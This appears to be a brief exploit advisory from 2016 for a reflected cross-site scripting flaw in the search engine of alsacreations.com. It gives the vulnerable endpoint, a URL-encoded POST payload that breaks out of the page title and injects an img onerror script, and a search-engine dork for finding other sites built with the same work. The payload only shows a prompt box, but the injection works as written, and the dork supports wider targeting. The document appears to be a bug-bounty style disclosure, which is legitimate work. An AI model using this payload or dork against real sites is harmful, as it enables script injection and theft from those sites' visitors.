----------------------------------------------------------------------
[Description]
#Exploit title: alsacreations reflected XSS
#Exploit author: Implosion
#Date: 27/08/2016
#Dorks: intext: "RĂ©alisation : Alsacreations.fr"
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability]
#This XSS is on the search engine here: /search/
#POST DATA : q=%3C%2Ftitle%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&recherche-submit=OK
----------------------------------------------------------------------
[Example]
#http://www.alsacreations.com/search/
----------------------------------------------------------------------
#Discovered By Implosion
#Greetz: NbSp_
----------------------------------------------------------------------